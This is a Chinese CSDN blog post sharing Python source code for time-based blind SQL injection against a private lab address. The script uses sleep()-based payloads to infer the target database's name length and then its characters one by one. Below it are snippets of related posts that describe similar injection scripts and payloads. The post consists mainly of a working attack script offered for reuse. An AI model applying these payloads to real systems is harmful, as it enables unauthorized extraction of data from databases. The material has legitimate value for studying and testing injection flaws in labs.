SQL盲注python脚本源码

最新推荐文章于 2024-04-24 20:45:00 发布
最新推荐文章于 2024-04-24 20:45:00 发布
阅读量161 收藏
点赞数
文章标签: sql python 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_59343440/article/details/122631204
版权 
#!D:\Typora\python

import requests

import time

import datetime
#获取数据库长度
def database_len():

    #存放跑出的结果
    length=0
    database=''
    print ("start get length...")
    
    for l in range(1,15):
    
        startTime1=time.time()
    
        url1 = "http://172.20.10.14/pentest/test/time/?type=1 and if(length(database())=%d,sleep(1),1)"%(l)
    
        response1 = requests.get(url1)
    
        if time.time() - startTime1 > 1:
    
            length+=l
    
    print ("the length :" , str(length))
    
       # break
    
    print ("start database sql injection...")

database_len()
#获取数据库名
def database_name():
    name = ''
    for j in range(1, 15):           #根据数据库名长度自行修改15这个数值
        for i in '0123456789abcdefghijklmnopqrstuvwxyz':
            url = '''http://172.20.10.14/pentest/test/time/'''
            payload = '''?type=if(substr(database(),%d,1)='%s',sleep(2),1)''' % (
                j, i)
            # print(url+payload+'%23')
            time1 = datetime.datetime.now()
            r = requests.get(url + payload + '%23')
            time2 = datetime.datetime.now()
            sec = (time2 - time1).seconds
            if sec >= 2:
                name += i
                print(name)
                break
    print('database_name:', name)


database_name()

嗷呜一口大桃子
关注
时间盲注python脚本.zip
12-28
python编写时间盲注自动化的脚本
基于时间盲注python脚本
weixin_43460822的博客
10-07 2295
思路:重要的是构建payload,然后循环进行测试,通过对请求的时间进行判断payload是否正确,从而确定数据库的长度和数据库的名称. #encoding=utf-8 #时间盲注脚本 import requests import time import datetime #获取数据库长度 def database_len(): #存放跑出的结果 length=0 ...
Python脚本-时间盲注
m0_74317362的博客
09-23 1144
添加了time.sleep(0.05)
帮我写一个时间盲注python脚本
weixin_35757531的博客
01-03 211
时间盲注攻击是一种数据库攻击方法,其目的是通过构造特殊的SQL查询语句来猜测数据库中的数据。在进行时间盲注攻击时,攻击者会在SQL查询中包含一个或多个条件,并通过测量查询的执行时间来判断条件是否成立。 下面是一个使用Python实现时间盲注攻击的示例代码: importtime import requests # 目标数据库地址 url = "http://database.com/query"...
python脚本实现sql时间盲注
wrypot的博客
03-27 830
python脚本实现sql盲注 sqli-labs-master pass-10 有好用脚本的大佬可以分享一波,抄袭转载请附上本文地址,违法必究。做时间盲注的只需要改一下url和payload,payload里面的闭合字符要改成正确的。将列的ascii码转化为字符,跟上面将表名的ascii码转化为字符一样。这里用sqli-labs-master第10关举例。将字段ascii码转化为字符。将表的ascii转化为字符。3、爆表名的ascii码。4、爆列的ascii码。5、爆字段ascii码。
PyQt5学生信息管理系统 Python源码 Python毕业设计 Python项目 源码+sql脚本
12-30
PyQt5学生信息管理系统 Python源码 Python毕业设计 Python项目 源码+sql脚本 期末作业要求用Qt做一个学生管理系统,笔者这段时间在自学Python,故在征求老师同意后不用C++而选择了Python的PyQt5,本项目主要实现了...
批量执行SQL脚本(附源码).zip
05-22
本文将深入探讨批量执行SQL脚本的原理以及提供的源码实现。 首先,批量执行SQL脚本通常涉及到读取一个或多个包含SQL命令的文本文件,并依次执行这些命令。这种功能可以极大地提高工作效率,避免手动逐条输入SQL语句...
基于Java语言开发的包含Shell和Python脚本的ERP系统设计源码
最新发布
10-01
该项目是一个全面的ERP系统设计源码,采用Java语言作为主要开发语言,并融入Shell和Python脚本,以增强系统功能。源码总文件量为3881个,其中包括3247个Java源文件、88个XML配置文件、66个图片文件(JPG和PNG)、47...
Python脚本项目源码-鲁迅名言查询系统
02-27
综上所述,这个“Python脚本项目源码-鲁迅名言查询系统”涵盖了Python基础、数据库操作、文件处理、用户交互、SQL查询以及异常处理等多个方面的知识。对于Python初学者,这是一个很好的实践项目,可以加深对Python...
Python脚本项目源码-邮箱安全性验证
02-27
这个"Python脚本项目源码-邮箱安全性验证"提供了一种利用Python编程语言来检查和验证电子邮件地址安全性的方法。以下是对这个项目的详细说明: 1. **Python语言基础**:Python是一种高级编程语言,以其易读性、简洁...
基于pythonsql注入脚本
03-04
适合刚学pythonsql注入的人 import urllib2 import re
时间盲注脚本
weixin_55347427的博客
08-02 342
fafaffafa
SQL-LABS GET型基于时间盲注脚本(node)
AaronLuo
09-05 696
原理 MYSQL 基于时间盲注详解 主要是通过将每个字符进行8次按位与运算,结果相加得到相应的ascii码值,进而得到对应的字符,通过此特性,构造Get请求,循环url,得到ascii码值,一个ascii码值需要执行8次按位与,只需要判断从发送请求到返回数据的耗时大于等于sleep函数的参数,则记录按位与得到的值,最后相加并转换得到一个字符,当转换的ascii码 = 0的时候,表示没有字符了,即可...
[教程] 基于时间盲注python3脚本编写
LuckySec
04-14 3115
0x001 时间盲注简介   时间盲注就是在页面进行SQL注入并执行后,前端页面无法回显注入的信息。此时,我们可以利用sleep()函数来控制延迟页面返回结果的时间,进而判断注入的SQL语句是否正确,这个过程称之为时间盲注。但如果手工进行注入的话,过程是非常频繁且耗时的,为了提高效率,我们需要编写自动化脚本替我们去完成这些注入工作。 0x002 漏洞测试代码 以下为本次实验测试的基于时间的数字...
用py写一个时间盲注脚本(初学向)
qq_62540010的博客
02-06 3482
用py写一个时间盲注脚本 1. 首先我们要清楚时间盲注的特点是利用了sql中sleep这个函数,借助的是响应时间不同来判断构造语句的对错,那么我们主要思路就要通过记录响应时间来执行一系列操作,下面是我写的一个简单脚本 2. import requests import time for i in range(1,20): url="http://127.0.0.1/sqli/Less-9/?id=1'and if(length(database())={i},1,sleep(5))--+"
python实现sql时间盲注
箭雨镜屋
04-26 1054
一、python代码 二、使用方法 三、测试
手工时间盲注python代码
m0_73767377的博客
04-09 209
【代码】手工时间盲注python代码,修改url和文件头后直接运行即可
37-5 基于时间的盲注 SQL 注入 PoC 的 Python 编写
weixin_43263566的博客
04-24 220
通过这个脚本,我们可以理解到利用Python编写脚本可以自动化执行一些复杂的任务,比如在这个例子中,我们通过自动化的方式来利用时间盲注漏洞获取数据库名称。,通过逐渐增加数据库名称长度的方式,发送带有长度检测payload的HTTP请求,直到找到正确的长度为止。,利用多线程技术,同时测试每个位置上的数据库名称字符,直到获取完整的数据库名称为止。,通过发送包含特殊payload的HTTP请求来检查是否存在SQL注入点。,用于测试给定位置的数据库名称字符是否匹配。下,依次调用上述函数,完成整个过程。
sql注入——时间盲注自动化注入脚本
栉风沐雪的博客
05-14 846
因为最近在学习sql注入,在学到时间盲注这里,发现注入的时候要从asc码33到127都查询一遍,手动注入工作量是在太大,想寻求是否存在什么简便方法,通过查询一些相关的书籍以及资料,将结果汇总如下。但这段代码仍存在很多不足,希望各位师傅指正。
Django汽车租赁管理网站开发教程(附Python源码+SQL
- Python 3.7:作为服务器端脚本语言,提供了项目的核心逻辑和后端服务。 - Django 3.x:一个高级的Python Web框架,用于快速开发安全和可维护的网站。 - Vue.js:一个渐进式JavaScript框架,用于构建用户界面的前端...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值